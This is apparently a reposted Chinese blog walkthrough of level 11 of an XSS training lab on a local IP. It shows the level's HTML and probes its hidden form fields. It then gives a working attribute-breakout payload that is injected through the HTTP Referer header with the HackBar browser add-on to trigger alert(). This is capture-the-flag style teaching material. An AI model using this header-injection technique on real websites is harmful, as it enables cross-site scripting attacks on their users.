标签:xss keyword 199.153 第十一 192.168 漏洞 level11 php
<!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不错!"); window.location.href="level12.php?keyword=good job!"; } </script> <title>欢迎来到level11</title> </head> <body> <h1 align=center>欢迎来到level11</h1> <h2 align=center>没有找到和good job!相关的结果.</h2><center> <form id=search> <input name="t_link" value="" type="hidden"> <input name="t_history" value="" type="hidden"> <input name="t_sort" value="" type="hidden"> <input name="t_ref" value="http://192.168.199.153/xss/level10.php?keyword=well%20done!&t_sort=%22type=%22test%22%20onclick=%22alert()" type="hidden"> </form> </center><center><img src=level11.png></center> <h3 align=center>payload的长度:9</h3></body> </html>
先按照第十关的方法试一下看能不能在输入框中解决。
http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_link=123
<input name="t_link" value="" type="hidden">
http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_history=123
<input name="t_history" value="" type="hidden">
http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_sort=123
<input name="t_sort" value="" type="hidden">
http://192.168.199.153/xss/level11.php?keyword=good%20job!&t_ref=123
<input name="t_ref" value="" type="hidden">
通过测试都不能使用。发现 t_ref 输入框中有value值,并且是url
使用火狐浏览器打开第十一关的URL,安装插件hackbar,安装好后,查看一下网络
发现请求头中的 referer=http://192.168.199.153/xss/level11.php?keyword=good%20job!
打开hackbar 输入url,选中referer,再输入代码 "type="test" onclick="alert ,点击Execute
这是输入框在页面中出现,点击,成功过关。
标签:xss,keyword,199.153,第十一,192.168,漏洞,level11,php 来源: https://www.cnblogs.com/ajdbk/p/16435905.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。